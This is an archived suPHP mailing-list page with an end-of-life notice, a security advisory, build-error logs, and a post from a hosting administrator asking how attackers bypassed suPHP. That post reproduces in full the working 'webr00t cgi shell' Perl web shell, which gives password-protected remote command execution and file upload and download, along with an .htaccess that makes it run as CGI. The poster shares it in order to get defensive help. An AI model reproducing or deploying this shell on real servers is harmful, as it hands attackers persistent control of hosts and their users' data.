headers
Sebastian Marsching | 22 May 2013 14:29

suPHP End of Life Notice

Dear suPHP community,

suPHP has been around for more than ten years now.

As some of you have noticed, the development activity has declined with 
time, in particular over the last four years.

I started the suPHP project when I was sharing a server with some 
friends and thus we wanted each user to have her individual space. As 
over time servers became cheaper and cheaper, each person started to use 
a server of her own. For about the last six years, I have only been 
using suPHP because my server had been setup this way and there was no 
immediate reason to change.

Thus, I have not been personally interested in further developing suPHP 
for quite some time. In addition to that I hardly found time to take 
care of suPHP in the last few years. I am still very interested and 
active in the idea of open-source software, however as my interests 
shifted, the projects I have been working on lately shifted as well.

If you want to get an idea about which kind of projects I am talking 
about, you might want to have a look at my personal projects at 
http://projects.marsching.org/ and my company's open-source projects at 
http://oss.aquenos.com/.

In conclusion this has left suPHP in a state where it would be 
irresponsible to suggest to users that it is being actively maintained. 
For example the latest security update has been lying around for years 
before actually being released.
(Continue reading)

Permalink | Reply | 0 comments |
headers
Aki Tuomi | 20 May 2013 19:37
Picon

Patch to allow configure against 2.4 Apache

Hi!

Attached, a small fix for configure.ac to enable compilation on Apache 2.4. 

I have tested this myself, and am runnign apache 2.4 with suphp successfully.

Aki Tuomi
Attachment (20130520_add_2_4_version.patch): text/x-diff, 543 bytes
_______________________________________________
suPHP mailing list
suPHP@...
https://lists.marsching.com/mailman/listinfo/suphp
Permalink | Reply | 0 comments |
headers
Sebastian Marsching | 20 May 2013 18:39

Security Update Released

Hi,

I just released suPHP 0.7.2, which fixes a security issue present in 
suPHP 0.7.0 and 0.7.1.

The bug existed in the routine handling the display of PHP source files:

When the suPHP_PHPPath was set, mod_suphp would use the specified PHP 
executable to pretty-print PHP source files (MIME type 
x-httpd-php-source or application/x-httpd-php-source).

However, it would not sanitize the environment. Thus a user that was 
allowed to use the SetEnv directive in a .htaccess file (AllowOverride 
FileInfo) could make PHP load a malicious configuration file (e.g. 
loading malicious extensions).

As the PHP process for highlighting the source file was run with the 
privileges of the user Apache HTTPd was running as, a local attacker 
could probably execute arbitrary code with the privileges of this user.

This update fixes the problem by cleaning the environment before calling 
the PHP executable for printing the source code.

I want to thank John Lightsey for reporting this bug.

You can avoid this issue without upgrading by making sure that 
suPHP_PHPPath is not set.

There is a second change in suPHP 0.7.2, which - while not having any 
direct security implications - addresses an issue, where some unwanted
(Continue reading)

Permalink | Reply | 0 comments |
headers
Roger Abt | 25 Mar 2013 19:47
Picon

CLI - STDIN/STDOUT not defined

Hi Folks

I like to contribute some code to the Joomla-CMS Core. I wrote a little app
that searches for updates 
and mail to the website owner, if any is available. So far not bad.
Developed on localhost (xampp/windows), 
testet on a hosting server (linux/shared).

And the script does not work on the hosting-server, because in a parent's
class constructor
(JApplicationCli = designed for commandline) is a statment, to ensure, that
the call is coming from the command-line:

if(!defined('STDOUT') | ! defined(STDIN) | !isset($_SERVER['argv']))
{
	die();
}

On the hosting server, that uses suPHP, I figured out that these two
constants STDIN and STDOUT are not defined, 
and thus let the script die. 

Because the existence of that statement let me assume, that in
php-cli-environments generally these two constants 
should be defined by default. Right? 

As I am not a server geek, my questions are (and hopefully someone has a
answer):

- is this statement wrong because these constants must not necessarly are
(Continue reading)

Permalink | Reply | 0 comments |
headers
r r | 22 Jan 2013 16:09
Picon

suPHP bypass Hack

Dear suPHP Users,

We are using for years suPHP on our sharehosting servers with success till today.

Also we use http://help.directadmin.com/item.php?id=247 for installation.

Code:
Safe Mode OFF Open BaseDir ON disable_functions:exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_source exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_source /tmp noexec chgrp apache /usr/bin/perl /usr/bin/wget /usr/local/bin/wget /usr/local/bin/curl /usr/bin/curl /usr/bin/python chmod 705 /usr/bin/perl /usr/bin/wget /usr/local/bin/wget /usr/local/bin/curl /usr/bin/curl /usr/bin/python

There scan on old joomla installations like 1.5.x 1.6.x 1.7.x and slipstream an upload file into the folder images/stories/* and replace all the index.* files in the server.

Yes i know users need always update there joomla to the last stable version.

But my biggest concern now is how there bypass suphp? it works for years great, bud it seems the hackers found a way to bypass this security.

Back into the days with CLI modes there did always the same trick, so thats why we switch to suPHP CGI/FastCGI modes.

There use tooling named webr00t cgi shell and make a symbolic link link to /root

Is there someone with the same problem?

The script at cgiweb/web.root:


#!/usr/bin/perl -I/usr/local/bandmain
#------------------------------------------------------------------------------
# <b style="color:black;background-color:#ffff66">webr00t cgi shell</b> # server
#------------------------------------------------------------------------------

#------------------------------------------------------------------------------
# Configuration: You need to change only $Password and $WinNT. The other
# values should work fine for most systems.
#------------------------------------------------------------------------------
$Password = "webr00t";        # Change this. You will need to enter this
                # to login.

$WinNT = 0;            # You need to change the value of this to 1 if
                # you're running this script on a Windows NT
                # machine. If you're running it on Unix, you
                # can leave the value as it is.

$NTCmdSep = "&";        # This character is used to seperate 2 commands
                # in a command line on Windows NT.

$UnixCmdSep = ";";        # This character is used to seperate 2 commands
                # in a command line on Unix.

$CommandTimeoutDuration = 10;    # Time in seconds after commands will be killed
                # Don't set this to a very large value. This is
                # useful for commands that may hang or that
                # take very long to execute, like "find /".
                # This is valid only on Unix servers. It is
                # ignored on NT Servers.

$ShowDynamicOutput = 1;        # If this is 1, then data is sent to the
                # browser as soon as it is output, otherwise
                # it is buffered and send when the command
                # completes. This is useful for commands like
                # ping, so that you can see the output as it
                # is being generated.

# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!

$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
$CmdPwd = ($WinNT ? "cd" : "pwd");
$PathSep = ($WinNT ? "\\" : "/");
$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");

#------------------------------------------------------------------------------
# Reads the input sent by the browser and parses the input variables. It
# parses GET, POST and multipart/form-data that is used for uploading files.
# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
# Other variables can be accessed using $in{'var'}, where var is the name of
# the variable. Note: Most of the code in this function is taken from other CGI
# scripts.
#------------------------------------------------------------------------------
sub ReadParse
{
    local (*in) = <at> _ if <at> _;
    local ($i, $loc, $key, $val);
   
    $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;

    if($ENV{'REQUEST_METHOD'} eq "GET")
    {
        $in = $ENV{'QUERY_STRING'};
    }
    elsif($ENV{'REQUEST_METHOD'} eq "POST")
    {
        binmode(STDIN) if $MultipartFormData & $WinNT;
        read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
    }

    # handle file upload data
    if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
    {
        $Boundary = '--'.$1; # please refer to RFC1867
        <at> list = split(/$Boundary/, $in);
        $HeaderBody = $list[1];
        $HeaderBody =~ /\r\n\r\n|\n\n/;
        $Header = $`;
        $Body = $';
         $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
        $in{'filedata'} = $Body;
        $Header =~ /filename=\"(.+)\"/;
        $in{'f'} = $1;
        $in{'f'} =~ s/\"//g;
        $in{'f'} =~ s/\s//g;

        # parse trailer
        for($i=2; $list[$i]; $i++)
        {
            $list[$i] =~ s/^.+name=$//;
            $list[$i] =~ /\"(\w+)\"/;
            $key = $1;
            $val = $';
            $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
            $val =~ s/%(..)/pack("c", hex($1))/ge;
            $in{$key} = $val;
        }
    }
    else # standard post data (url encoded, not multipart)
    {
        <at> in = split(/&/, $in);
        foreach $i (0 .. $#in)
        {
            $in[$i] =~ s/\+/ /g;
            ($key, $val) = split(/=/, $in[$i], 2);
            $key =~ s/%(..)/pack("c", hex($1))/ge;
            $val =~ s/%(..)/pack("c", hex($1))/ge;
            $in{$key} .= "\0" if (defined($in{$key}));
            $in{$key} .= $val;
        }
    }
}

#------------------------------------------------------------------------------
# Prints the HTML Page Header
# Argument 1: Form item name to which focus should be set
#------------------------------------------------------------------------------
sub PrintPageHeader
{
    $EncodedCurrentDir = $CurrentDir;
    $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
    print "Content-type: text/html\n\n";
    print <<END;
<html>
<head>
<title>webr00t cgi shell</title>
$HtmlMetaHeader

<meta name="keywords" content="W£ßRooT,webr00t,webr00t.info,hacker">
<meta name="description" content="W£ßRooT,webr00t,webr00t.info,hacker">
</head>
<body onLoad="document.f. <at> _.focus()" bgcolor="#FFFFFF" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" text="#FF0000">
<table border="1" width="100%" cellspacing="0" cellpadding="2">
<tr>
<td bgcolor="#FFFFFF" bordercolor="#FFFFFF" align="center" width="1%">
<b><font size="2">#</font></b></td>
<td bgcolor="#FFFFFF" width="98%"><font face="Verdana" size="2"><b>
<b style="color:black;background-color:#ffff66">webr00t cgi shell</b> Connected to $ServerName</b></font></td>
</tr>
<tr>
<td colspan="2" bgcolor="#FFFFFF"><font face="Verdana" size="2">

<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir"><font color="#FF0000">Upload File</font></a> |
<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir"><font color="#FF0000">Download File</font></a> |
<a href="$ScriptLocation?a=logout"><font color="#FF0000">Disconnect</font></a> |
</font></td>
</tr>
</table>
<font size="3">
END
}

#------------------------------------------------------------------------------
# Prints the Login Screen
#------------------------------------------------------------------------------
sub PrintLoginScreen
{
    $Message = q$<pre><img border="0" src="http://img810.imageshack.us/img810/8043/webr00t12.png"></pre><br><br></font><h1>Sifre=webr00t</h1>
$;
#'
    print <<END;
<code>

Trying $ServerName...<br>
Connected to $ServerName<br>
Escape character is ^]
<code>$Message
END
}

#------------------------------------------------------------------------------
# Prints the message that informs the user of a failed login
#------------------------------------------------------------------------------
sub PrintLoginFailedMessage
{
    print <<END;
<code>
<br>login: admin<br>
password:<br>
Login incorrect<br><br>
</code>
END
}

#------------------------------------------------------------------------------
# Prints the HTML form for logging in
#------------------------------------------------------------------------------
sub PrintLoginForm
{
    print <<END;
<code>

<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="login">
</font>
<font size="3">
login: <b style="color:black;background-color:#ffff66">webr00t cgi shell</b><br>
password:</font><font color="#009900" size="3"><input type="password" name="p">
<input type="submit" value="Enter">
</form>
</code>
END
}

#------------------------------------------------------------------------------
# Prints the footer for the HTML Page
#------------------------------------------------------------------------------
sub PrintPageFooter
{
    print "</font></body></html>";
}

#------------------------------------------------------------------------------
# Retreives the values of all cookies. The cookies can be accesses using the
# variable $Cookies{''}
#------------------------------------------------------------------------------
sub GetCookies
{
    <at> httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
    foreach $cookie( <at> httpcookies)
    {
        ($id, $val) = split(/=/, $cookie);
        $Cookies{$id} = $val;
    }
}

#------------------------------------------------------------------------------
# Prints the screen when the user logs out
#------------------------------------------------------------------------------
sub PrintLogoutScreen
{
    print "<code>Connection closed by foreign host.<br><br></code>";
}

#------------------------------------------------------------------------------
# Logs out the user and allows the user to login again
#------------------------------------------------------------------------------
sub PerformLogout
{
    print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
    &PrintPageHeader("p");
    &PrintLogoutScreen;

    &PrintLoginScreen;
    &PrintLoginForm;
    &PrintPageFooter;
}

#------------------------------------------------------------------------------
# This function is called to login the user. If the password matches, it
# displays a page that allows the user to run commands. If the password doens't
# match or if no password is entered, it displays a form that allows the user
# to login
#------------------------------------------------------------------------------
sub PerformLogin
{
    if($LoginPassword eq $Password) # password matched
    {
        print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
        &PrintPageHeader("c");
        &PrintCommandLineInputForm;
        &PrintPageFooter;
    }
    else # password didn't match
    {
        &PrintPageHeader("p");
        &PrintLoginScreen;
        if($LoginPassword ne "") # some password was entered
        {
            &PrintLoginFailedMessage;

        }
        &PrintLoginForm;
        &PrintPageFooter;
    }
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to enter commands
#------------------------------------------------------------------------------
sub PrintCommandLineInputForm
{
    $Prompt = $WinNT ? "$CurrentDir> " : "[admin\ <at> $ServerName $CurrentDir]\$ ";
    print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="command">
<input type="hidden" name="d" value="$CurrentDir">
$Prompt
<input type="text" name="c">
<input type="submit" value="Enter">
</form>
</code>

END
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to download files
#------------------------------------------------------------------------------
sub PrintFileDownloadForm
{
    $Prompt = $WinNT ? "$CurrentDir> " : "[admin\ <at> $ServerName $CurrentDir]\$ ";
    print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="download">
$Prompt download<br><br>
Filename: <input type="text" name="f" size="35"><br><br>
Download: <input type="submit" value="Begin">
</form>
</code>
END
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to upload files
#------------------------------------------------------------------------------
sub PrintFileUploadForm
{
    $Prompt = $WinNT ? "$CurrentDir> " : "[admin\ <at> $ServerName $CurrentDir]\$ ";
    print <<END;
<code>

<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
$Prompt upload<br><br>
Filename: <input type="file" name="f" size="35"><br><br>
Options: &nbsp;<input type="checkbox" name="o" value="overwrite">
Overwrite if it Exists<br><br>
Upload:&nbsp;&nbsp;&nbsp;<input type="submit" value="Begin">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="upload">
</form>
</code>
END
}

#------------------------------------------------------------------------------
# This function is called when the timeout for a command expires. We need to
# terminate the script immediately. This function is valid only on Unix. It is
# never called when the script is running on NT.
#------------------------------------------------------------------------------
sub CommandTimeout
{
    if(!$WinNT)
    {
        alarm(0);
        print <<END;
</xmp>

<code>
Command exceeded maximum time of $CommandTimeoutDuration second(s).
<br>Killed it!
END
        &PrintCommandLineInputForm;
        &PrintPageFooter;
        exit;
    }
}

#------------------------------------------------------------------------------
# This function is called to execute commands. It displays the output of the
# command and allows the user to enter another command. The change directory
# command is handled differently. In this case, the new directory is stored in
# an internal variable and is used each time a command has to be executed. The
# output of the change directory command is not displayed to the users
# therefore error messages cannot be displayed.
#------------------------------------------------------------------------------
sub ExecuteCommand
{
    if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
    {
        # we change the directory internally. The output of the
        # command is not displayed.
       
        $OldDir = $CurrentDir;
        $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
        chop($CurrentDir = `$Command`);
        &PrintPageHeader("c");
        $Prompt = $WinNT ? "$OldDir> " : "[admin\ <at> $ServerName $OldDir]\$ ";
        print "$Prompt $RunCommand";
    }
    else # some other command, display the output
    {
        &PrintPageHeader("c");
        $Prompt = $WinNT ? "$CurrentDir> " : "[admin\ <at> $ServerName $CurrentDir]\$ ";
        print "$Prompt $RunCommand<xmp>";
        $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
        if(!$WinNT)
        {
            $SIG{'ALRM'} = \&CommandTimeout;
            alarm($CommandTimeoutDuration);
        }
        if($ShowDynamicOutput) # show output as it is generated
        {
            $|=1;
            $Command .= " |";
            open(CommandOutput, $Command);
            while(<CommandOutput>)
            {
                $_ =~ s/(\n|\r\n)$//;
                print "$_\n";
            }
            $|=0;
        }
        else # show output after command completes
        {
            print `$Command`;
        }
        if(!$WinNT)
        {
            alarm(0);
        }
        print "</xmp>";
    }
    &PrintCommandLineInputForm;
    &PrintPageFooter;
}

#------------------------------------------------------------------------------
# This function displays the page that contains a link which allows the user
# to download the specified file. The page also contains a auto-refresh
# feature that starts the download automatically.
# Argument 1: Fully qualified filename of the file to be downloaded
#------------------------------------------------------------------------------
sub PrintDownloadLinkPage
{
    local($FileUrl) = <at> _;
    if(-e $FileUrl) # if the file exists
    {
        # encode the file link so we can send it to the browser
        $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
        $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
        $HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
        &PrintPageHeader("c");
        print <<END;
<code>

Sending File $TransferFile...<br>
If the download does not start automatically,
<a href="$DownloadLink">Click Here</a>.
END
        &PrintCommandLineInputForm;
        &PrintPageFooter;
    }
    else # file doesn't exist
    {
        &PrintPageHeader("f");
        print "Failed to download $FileUrl: $!";
        &PrintFileDownloadForm;
        &PrintPageFooter;
    }
}

#------------------------------------------------------------------------------
# This function reads the specified file from the disk and sends it to the
# browser, so that it can be downloaded by the user.
# Argument 1: Fully qualified pathname of the file to be sent.
#------------------------------------------------------------------------------
sub SendFileToBrowser
{
    local($SendFile) = <at> _;
    if(open(SENDFILE, $SendFile)) # file opened for reading
    {
        if($WinNT)
        {
            binmode(SENDFILE);
            binmode(STDOUT);
        }
        $FileSize = (stat($SendFile))[7];
        ($Filename = $SendFile) =~  m!([^/^\\]*)$!;
        print "Content-Type: application/x-unknown\n";
        print "Content-Length: $FileSize\n";
        print "Content-Disposition: attachment; filename=$1\n\n";
        print while(<SENDFILE>);
        close(SENDFILE);
    }
    else # failed to open file
    {
        &PrintPageHeader("f");
        print "Failed to download $SendFile: $!";
        &PrintFileDownloadForm;

        &PrintPageFooter;
    }
}


#------------------------------------------------------------------------------
# This function is called when the user downloads a file. It displays a message
# to the user and provides a link through which the file can be downloaded.
# This function is also called when the user clicks on that link. In this case,
# the file is read and sent to the browser.
#------------------------------------------------------------------------------
sub BeginDownload
{
    # get fully qualified path of the file to be downloaded
    if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
        (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
    {
        $TargetFile = $TransferFile;
    }
    else # path is relative
    {
        chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
        $TargetFile .= $PathSep.$TransferFile;
    }

    if($Options eq "go") # we have to send the file
    {
        &SendFileToBrowser($TargetFile);
    }
    else # we have to send only the link page
    {
        &PrintDownloadLinkPage($TargetFile);
    }
}

#------------------------------------------------------------------------------
# This function is called when the user wants to upload a file. If the
# file is not specified, it displays a form allowing the user to specify a
# file, otherwise it starts the upload process.
#------------------------------------------------------------------------------
sub UploadFile
{
    # if no file is specified, print the upload form again
    if($TransferFile eq "")
    {
        &PrintPageHeader("f");
        &PrintFileUploadForm;
        &PrintPageFooter;
        return;
    }
    &PrintPageHeader("c");

    # start the uploading process
    print "Uploading $TransferFile to $CurrentDir...<br>";

    # get the fullly qualified pathname of the file to be created
    chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
    $TransferFile =~ m!([^/^\\]*)$!;
    $TargetName .= $PathSep.$1;

    $TargetFileSize = length($in{'filedata'});
    # if the file exists and we are not supposed to overwrite it
    if(-e $TargetName && $Options ne "overwrite")
    {
        print "Failed: Destination file already exists.<br>";
    }
    else # file is not present
    {
        if(open(UPLOADFILE, ">$TargetName"))
        {
            binmode(UPLOADFILE) if $WinNT;
            print UPLOADFILE $in{'filedata'};
            close(UPLOADFILE);
            print "Transfered $TargetFileSize Bytes.<br>";
            print "File Path: $TargetName<br>";
        }
        else
        {
            print "Failed: $!<br>";
        }
    }
    print "";
    &PrintCommandLineInputForm;

    &PrintPageFooter;
}

#------------------------------------------------------------------------------
# This function is called when the user wants to download a file. If the
# filename is not specified, it displays a form allowing the user to specify a
# file, otherwise it displays a message to the user and provides a link
# through  which the file can be downloaded.
#------------------------------------------------------------------------------
sub DownloadFile
{
    # if no file is specified, print the download form again
    if($TransferFile eq "")
    {
        &PrintPageHeader("f");
        &PrintFileDownloadForm;
        &PrintPageFooter;
        return;
    }
   
    # get fully qualified path of the file to be downloaded
    if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
        (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
    {
        $TargetFile = $TransferFile;
    }
    else # path is relative
    {
        chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
        $TargetFile .= $PathSep.$TransferFile;
    }

    if($Options eq "go") # we have to send the file
    {
        &SendFileToBrowser($TargetFile);
    }
    else # we have to send only the link page
    {
        &PrintDownloadLinkPage($TargetFile);
    }
}

#------------------------------------------------------------------------------
# Main Program - Execution Starts Here
#------------------------------------------------------------------------------
&ReadParse;
&GetCookies;

$ScriptLocation = $ENV{'SCRIPT_NAME'};
$ServerName = $ENV{'SERVER_NAME'};
$LoginPassword = $in{'p'};
$RunCommand = $in{'c'};
$TransferFile = $in{'f'};
$Options = $in{'o'};

$Action = $in{'a'};
$Action = "login" if($Action eq ""); # no action specified, use default

# get the directory in which the commands will be executed
$CurrentDir = $in{'d'};
chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");

$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;

if($Action eq "login" || !$LoggedIn) # user needs/has to login
{
    &PerformLogin;

}
elsif($Action eq "command") # user wants to run a command
{
    &ExecuteCommand;
}
elsif($Action eq "upload") # user wants to upload a file
{
    &UploadFile;
}
elsif($Action eq "download") # user wants to download a file
{
    &DownloadFile;
}
elsif($Action eq "logout") # user wants to logout
{
    &PerformLogout;
}

 And there place .htaccess:

Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .root

AddHandler cgi-script .root
AddHandler cgi-script .root

I hope there is some fix.

Thanks for your feedback.

Greetings remco 

_______________________________________________
suPHP mailing list
suPHP@...
https://lists.marsching.com/mailman/listinfo/suphp
Permalink | Reply | 1 comment |
headers
michal | 26 Dec 2012 14:58
Picon

(no subject)

Does suPHP supports HTTP Authentication Header?
Permalink | Reply | 1 comment |
headers
jaseemkvt | 9 Oct 2012 05:38
Picon

ERROR-SUPHP-0.7.1-COMPILATION

Hi All,
While i am trying to compile suphp-0.7.1 with apache-2.4.3 i got following errors.Plz help me by giving your valuable suggestions.


 [root <at> mr suphp-0.7.1]# ./configure --prefix=/lamp/suphp --with-apxs=/lamp/apache/bin/apxs --with-apache-user=daemon --with-logfile=/var/log/httpd/suphp_log --with-setid-mode=paranoid --sysconfdir=/etc --with-apr=/lamp/apache/bin/apr-1-config --with-php=/lamp/php/bin/php-cgi --enable-suphp_USE_USERGROUP=yes
checking for a BSD-compatible install... /usr/bin/install -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... /bin/mkdir -p
checking for gawk... gawk
checking whether make sets $(MAKE)... yes
checking whether build environment is sane... yes
checking for a BSD-compatible install... /usr/bin/install -c
checking for gcc... gcc
checking for C compiler default output file name... a.out
checking whether the C compiler works... yes
checking whether we are cross compiling... no
checking for suffix of executables...
checking for suffix of object files... o
checking whether we are using the GNU C compiler... yes
checking whether gcc accepts -g... yes
checking for gcc option to accept ISO C89... none needed
checking for style of include used by make... GNU
checking dependency style of gcc... gcc3
checking for g++... g++
checking whether we are using the GNU C++ compiler... yes
checking whether g++ accepts -g... yes
checking dependency style of g++... gcc3
checking build system type... x86_64-unknown-linux-gnu
checking host system type... x86_64-unknown-linux-gnu
checking for a sed that does not truncate output... /bin/sed
checking for grep that handles long lines and -e... /bin/grep
checking for egrep... /bin/grep -E
checking for ld used by gcc... /usr/bin/ld
checking if the linker (/usr/bin/ld) is GNU ld... yes
checking for /usr/bin/ld option to reload object files... -r
checking for BSD-compatible nm... /usr/bin/nm -B
checking whether ln -s works... yes
checking how to recognize dependent libraries... pass_all
checking how to run the C preprocessor... gcc -E
checking for ANSI C header files... yes
checking for sys/types.h... yes
checking for sys/stat.h... yes
checking for stdlib.h... yes
checking for string.h... yes
checking for memory.h... yes
checking for strings.h... yes
checking for inttypes.h... yes
checking for stdint.h... yes
checking for unistd.h... yes
checking dlfcn.h usability... yes
checking dlfcn.h presence... yes
checking for dlfcn.h... yes
checking how to run the C++ preprocessor... g++ -E
checking for g77... no
checking for xlf... no
checking for f77... no
checking for frt... no
checking for pgf77... no
checking for cf77... no
checking for fort77... no
checking for fl32... no
checking for af77... no
checking for xlf90... no
checking for f90... no
checking for pgf90... no
checking for pghpf... no
checking for epcf90... no
checking for gfortran... no
checking for g95... no
checking for xlf95... no
checking for f95... no
checking for fort... no
checking for ifort... no
checking for ifc... no
checking for efc... no
checking for pgf95... no
checking for lf95... no
checking for ftn... no
checking whether we are using the GNU Fortran 77 compiler... no
checking whether  accepts -g... no
checking the maximum length of command line arguments... 98304
checking command to parse /usr/bin/nm -B output from gcc object... ok
checking for objdir... .libs
checking for ar... ar
checking for ranlib... ranlib
checking for strip... strip
checking if gcc supports -fno-rtti -fno-exceptions... no
checking for gcc option to produce PIC... -fPIC
checking if gcc PIC flag -fPIC works... yes
checking if gcc static flag -static works... yes
checking if gcc supports -c -o file.o... yes
checking whether the gcc linker (/usr/bin/ld -m elf_x86_64) supports shared libraries... yes
checking whether -lc should be explicitly linked in... no
checking dynamic linker characteristics... GNU/Linux ld.so
checking how to hardcode library paths into programs... immediate
checking whether stripping libraries is possible... yes
checking if libtool supports shared libraries... yes
checking whether to build shared libraries... yes
checking whether to build static libraries... yes
configure: creating libtool
appending configuration tag "CXX" to libtool
checking for ld used by g++... /usr/bin/ld -m elf_x86_64
checking if the linker (/usr/bin/ld -m elf_x86_64) is GNU ld... yes
checking whether the g++ linker (/usr/bin/ld -m elf_x86_64) supports shared libraries... yes
checking for g++ option to produce PIC... -fPIC
checking if g++ PIC flag -fPIC works... yes
checking if g++ static flag -static works... yes
checking if g++ supports -c -o file.o... yes
checking whether the g++ linker (/usr/bin/ld -m elf_x86_64) supports shared libraries... yes
checking dynamic linker characteristics... GNU/Linux ld.so
(cached) (cached) checking how to hardcode library paths into programs... immediate
appending configuration tag "F77" to libtool
checking for ANSI C header files... (cached) yes
checking fcntl.h usability... yes
checking fcntl.h presence... yes
checking for fcntl.h... yes
checking for stdlib.h... (cached) yes
checking for string.h... (cached) yes
checking for unistd.h... (cached) yes
checking for APR... yes
checking for dynamic Apache module support (via APXS)... found at /lamp/apache/bin/apxs (version 2.4.3)
checking for set-UID/set-GID mode... ok - using paranoid
configure: creating ./config.status
config.status: creating Makefile
config.status: creating src/Makefile
config.status: creating src/apache/Makefile
config.status: creating src/apache2/Makefile
config.status: creating src/config.h
config.status: executing depfiles commands





[root <at> mr suphp-0.7.1]# make
Making all in src
make[1]: Entering directory `/root/suphp-0.7.1/src'
make  all-recursive
make[2]: Entering directory `/root/suphp-0.7.1/src'
Making all in apache
make[3]: Entering directory `/root/suphp-0.7.1/src/apache'
/bin/sh ../../libtool --tag=CC   --mode=compile gcc -DHAVE_CONFIG_H -I. -I../../src    -I/lamp/apache/include -DSUPHP_PATH_TO_SUPHP=\"/lamp/suphp/sbin/suphp\" -DSUPHP_USE_USERGROUP -g -O2 -MT mod_suphp.lo -MD -MP -MF .deps/mod_suphp.Tpo -c -o mod_suphp.lo mod_suphp.c
mkdir .libs
 gcc -DHAVE_CONFIG_H -I. -I../../src -I/lamp/apache/include -DSUPHP_PATH_TO_SUPHP=\"/lamp/suphp/sbin/suphp\" -DSUPHP_USE_USERGROUP -g -O2 -MT mod_suphp.lo -MD -MP -MF .deps/mod_suphp.Tpo -c mod_suphp.c  -fPIC -DPIC -o .libs/mod_suphp.o
mod_suphp.c:47: error: expected â=â, â,â, â;â, âasmâ or â__attribute__â before âsuphp_moduleâ
mod_suphp.c:59: error: expected specifier-qualifier-list before âtableâ
mod_suphp.c:66: error: expected â)â before â*â token
mod_suphp.c:84: error: expected â)â before â*â token
mod_suphp.c:125: error: expected â)â before â*â token
mod_suphp.c:145: error: expected â)â before â*â token
mod_suphp.c: In function âsuphp_handle_cmd_engineâ:
mod_suphp.c:191: error: âsuphp_moduleâ undeclared (first use in this function)
mod_suphp.c:191: error: (Each undeclared identifier is reported only once
mod_suphp.c:191: error: for each function it appears in.)
mod_suphp.c: In function âsuphp_handle_cmd_configâ:
mod_suphp.c:207: warning: assignment makes pointer from integer without a cast
mod_suphp.c: In function âsuphp_handle_cmd_user_groupâ:
mod_suphp.c:222: error: âsuphp_moduleâ undeclared (first use in this function)
mod_suphp.c:224: warning: assignment makes pointer from integer without a cast
mod_suphp.c:225: warning: assignment makes pointer from integer without a cast
mod_suphp.c: In function âsuphp_handle_cmd_add_handlerâ:
mod_suphp.c:238: error: âsuphp_moduleâ undeclared (first use in this function)
mod_suphp.c:241: error: âsuphp_confâ has no member named âhandlersâ
mod_suphp.c: In function âsuphp_handle_cmd_remove_handlerâ:
mod_suphp.c:253: error: âsuphp_moduleâ undeclared (first use in this function)
mod_suphp.c:256: error: âsuphp_confâ has no member named âhandlersâ
mod_suphp.c: In function âsuphp_handle_cmd_phppathâ:
mod_suphp.c:266: error: âsuphp_moduleâ undeclared (first use in this function)
mod_suphp.c:268: error: âsuphp_confâ has no member named âphp_pathâ
mod_suphp.c: At top level:
mod_suphp.c:277: warning: initialization from incompatible pointer type
mod_suphp.c:279: warning: initialization from incompatible pointer type
mod_suphp.c:282: warning: initialization from incompatible pointer type
mod_suphp.c:285: warning: initialization from incompatible pointer type
mod_suphp.c:287: warning: initialization from incompatible pointer type
mod_suphp.c:289: warning: initialization from incompatible pointer type
mod_suphp.c:296: error: expected declaration specifiers or â...â before âchild_infoâ
mod_suphp.c: In function âsuphp_source_childâ:
mod_suphp.c:299: error: âpoolâ undeclared (first use in this function)
mod_suphp.c:299: error: âpâ undeclared (first use in this function)
mod_suphp.c:302: error: âsuphp_moduleâ undeclared (first use in this function)
mod_suphp.c:309: warning: assignment makes pointer from integer without a cast
mod_suphp.c:310: error: âsuphp_confâ has no member named âphp_pathâ
